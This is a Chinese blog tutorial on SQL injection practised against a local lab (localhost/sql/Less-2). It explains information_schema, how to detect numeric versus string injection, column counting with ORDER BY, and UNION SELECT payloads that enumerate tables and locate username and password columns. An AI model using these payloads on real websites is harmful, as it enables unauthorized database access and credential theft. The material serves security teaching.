网络安全(sql注入)

2024-09-07 21:36

本文主要是介绍网络安全(sql注入),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

这里写目录标题

  • 一. information_schema.tables 和 information_schema.schemata是information_schema数据库中的两张表
    • 1. information_schema.schemata
    • 2. information_schema.tables
  • 二. 判断注入类型
    • 1. 判断数字型还是字符型注入
    • 2. 判断注入闭合是""还是''
  • 三. 判断表的列数
  • 五. 注入变量的类型
  • 六. SQL注入步骤
    • 快速判断是数字还是字符型输入方法为:

什么是sql注入,按理来说我们的查询语句应该在后台构建,不应该把查询语句放到url中,但是sql注入就是通过语法漏洞将查询语句放到url中,从而进行入侵

一. information_schema.tables 和 information_schema.schemata是information_schema数据库中的两张表

1. information_schema.schemata

功能:information_schema.schemata 表提供关于当前数据库实例中所有数据库(或称为“模式”,schema)的信息。

常用列:

schema_name:数据库或模式的名称。
catalog_name:数据库目录的名称(通常是数据库实例的名称)。
default_character_set_name:数据库的默认字符集。
default_collation_name:数据库的默认排序规则。
用途:用于列出数据库实例中所有的数据库。可以帮助管理员了解在数据库服务器上有哪些数据库或模式。

2. information_schema.tables

功能:information_schema.tables 表提供当前数据库实例中所有表(包括视图)的信息。

常用列:

table_catalog:表的目录名称(通常是数据库实例的名称)。
table_schema:表所属的数据库或模式的名称。
table_name:表的名称。
table_type:表的类型(BASE TABLE表示物理表,VIEW表示视图等)。
engine(MySQL特有):表使用的存储引擎(例如,InnoDB、MyISAM 等)。
用途:用于列出所有表以及它们所属的数据库。可以帮助管理员或开发人员了解每个数据库中存在的表和视图。

区别总结
信息内容:schemata 提供的是数据库级别的信息(列出所有数据库),而 tables 提供的是表级别的信息(列出所有表及其所属的数据库)。
用途:schemata 用于查看数据库实例中有哪些数据库;tables 用于查看具体的数据库中有哪些表或视图。

如果你想查看当前实例中有哪些数据库,可以使用:
表示从information_schema.schemata这张表中查询信息SELECT schema_name FROM information_schema.schemata;如果你想查看某个特定数据库中的所有表,可以使用:SELECT table_name FROM information_schema.tables WHERE table_schema = 
'your_database_name';
查看当前数据库中的所有表名和表中对应列名
SELECT * FROM `users` WHERE id=-1 UNION SELECT 1, table_name, column_name FROM 
information_schema.columns where table_schema=database();

使用group by就必须使用聚合函数如MIN(),SUM(),GROUP_CONCAT(),count()。
同时having尽量和group by连用,因为having后要使用聚合函数如:HAVING SUM(salary) > 5000。这种功能在 WHERE 中是无法实现的,因为 WHERE 无法作用于聚合结果。

SELECT GROUP_CONCAT(id) AS ids, department, COUNT(*) AS 
employee_count, 
SUM(salary) AS total_salary
FROM employees
GROUP BY department;
idsdepartmentemployee_counttotal_salary
1,4HR29800
2,3IT211500

查询当前数据库中只包含username和password列的表,这里使用了group by因为只有使用了group by
分组后,使用having进行聚合会更加精细。

http://localhost/sql/Less-2/
?id=-2 union select 1,group_concat(distinct table_name),3 from
information_schema.columns where table_schema=database() and column_name in 
('username','password') group by table_name having count(distinct column_name)=2

二. 判断注入类型

1. 判断数字型还是字符型注入

字符型注入需要构造闭合,数字型不需要。
在这里插入图片描述

2. 判断注入闭合是""还是’’

如果是字符型注入且闭合类型为"",输入http://localhost/sql/Less-2/?id=1则会默认给1加上闭合为:

SELECT * FROM table_name WHERE id = "1";SELECT * FROM table_name WHERE id = '1';
具体取决于闭合形式是''还是""

视频链接13:21
文档

如果是字符型注入且闭合类型为"",输入http://localhost/sql/Less-2/?id=1"则为

SELECT * FROM table_name WHERE id = "1"";
因为不闭合所有肯定会报错

此时我们在语句后加注释
http://localhost/sql/Less-2/?id=1" – (注意末尾有一个空格),则可以注释掉"

SELECT * FROM table_name WHERE id = "1";
正确

三. 判断表的列数

如果有表有三列则会正常返回结果
http://localhost/sql/Less-2/?id=“1” group by 3

SELECT * FROM table_name WHERE id = "1" GROUP BY 3;

或者使用
http://localhost/sql/Less-2/?id=“1” order by 3

SELECT * FROM table_name WHERE id = "1" ORDER BY 3;

五. 注入变量的类型

比如对一个数字型注入输入,http://localhost/sql/Less-2/?id=0 OR username=Dumb,错误
输入http://localhost/sql/Less-2/?id=0 OR username="Dumb"正确,因为username是char型的,查找类型不匹配也不行

六. SQL注入步骤

快速判断是数字还是字符型输入方法为:

  1. 输入http://localhost/sql/Less-2/?id=0 and 1=1,如果报错则是字符型输入。因为当前查询会被转换为

    SELECT * FROM users WHERE id = '1 and 1=1';
    id是整形,在去掉闭合后id=1 and 1=1,肯定不匹配报错.
    

    如果要注入则需要变为
    http://localhost/sql/Less-2/?id=0’ and 1=1 – (注意–后保留一个空格)

    SELECT * FROM users WHERE id = '1' and 1=1;
    去掉闭合后id=1,满足整形
    
    1. 输入http://localhost/sql/Less-2/?id=2-1,如果是数字型则会返回id=1的列
      使用select 1,2,database()等来查询数据库的库名

在这里插入图片描述

这篇关于网络安全(sql注入)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1146223

相关文章

使用 sql-research-assistant进行 SQL 数据库研究的实战指南(代码实现演示)

《使用sql-research-assistant进行SQL数据库研究的实战指南(代码实现演示)》本文介绍了sql-research-assistant工具,该工具基于LangChain框架,集... 目录技术背景介绍核心原理解析代码实现演示安装和配置项目集成LangSmith 配置(可选)启动服务应用场景

oracle DBMS_SQL.PARSE的使用方法和示例

《oracleDBMS_SQL.PARSE的使用方法和示例》DBMS_SQL是Oracle数据库中的一个强大包,用于动态构建和执行SQL语句,DBMS_SQL.PARSE过程解析SQL语句或PL/S... 目录语法示例注意事项DBMS_SQL 是 oracle 数据库中的一个强大包,它允许动态地构建和执行

SQL 中多表查询的常见连接方式详解

《SQL中多表查询的常见连接方式详解》本文介绍SQL中多表查询的常见连接方式,包括内连接(INNERJOIN)、左连接(LEFTJOIN)、右连接(RIGHTJOIN)、全外连接(FULLOUTER... 目录一、连接类型图表(ASCII 形式)二、前置代码(创建示例表)三、连接方式代码示例1. 内连接(I

在MySQL执行UPDATE语句时遇到的错误1175的解决方案

《在MySQL执行UPDATE语句时遇到的错误1175的解决方案》MySQL安全更新模式(SafeUpdateMode)限制了UPDATE和DELETE操作,要求使用WHERE子句时必须基于主键或索引... mysql 中遇到的 Error Code: 1175 是由于启用了 安全更新模式(Safe Upd

轻松上手MYSQL之JSON函数实现高效数据查询与操作

《轻松上手MYSQL之JSON函数实现高效数据查询与操作》:本文主要介绍轻松上手MYSQL之JSON函数实现高效数据查询与操作的相关资料,MySQL提供了多个JSON函数,用于处理和查询JSON数... 目录一、jsON_EXTRACT 提取指定数据二、JSON_UNQUOTE 取消双引号三、JSON_KE

MySql死锁怎么排查的方法实现

《MySql死锁怎么排查的方法实现》本文主要介绍了MySql死锁怎么排查的方法实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录前言一、死锁排查方法1. 查看死锁日志方法 1:启用死锁日志输出方法 2:检查 mysql 错误

MySQL数据库函数之JSON_EXTRACT示例代码

《MySQL数据库函数之JSON_EXTRACT示例代码》:本文主要介绍MySQL数据库函数之JSON_EXTRACT的相关资料,JSON_EXTRACT()函数用于从JSON文档中提取值,支持对... 目录前言基本语法路径表达式示例示例 1: 提取简单值示例 2: 提取嵌套值示例 3: 提取数组中的值注意

MySQL修改密码的四种实现方式

《MySQL修改密码的四种实现方式》文章主要介绍了如何使用命令行工具修改MySQL密码,包括使用`setpassword`命令和`mysqladmin`命令,此外,还详细描述了忘记密码时的处理方法,包... 目录mysql修改密码四种方式一、set password命令二、使用mysqladmin三、修改u

查询SQL Server数据库服务器IP地址的多种有效方法

《查询SQLServer数据库服务器IP地址的多种有效方法》作为数据库管理员或开发人员,了解如何查询SQLServer数据库服务器的IP地址是一项重要技能,本文将介绍几种简单而有效的方法,帮助你轻松... 目录使用T-SQL查询方法1:使用系统函数方法2:使用系统视图使用SQL Server Configu

SQL Server数据库迁移到MySQL的完整指南

《SQLServer数据库迁移到MySQL的完整指南》在企业应用开发中,数据库迁移是一个常见的需求,随着业务的发展,企业可能会从SQLServer转向MySQL,原因可能是成本、性能、跨平台兼容性等... 目录一、迁移前的准备工作1.1 确定迁移范围1.2 评估兼容性1.3 备份数据二、迁移工具的选择2.1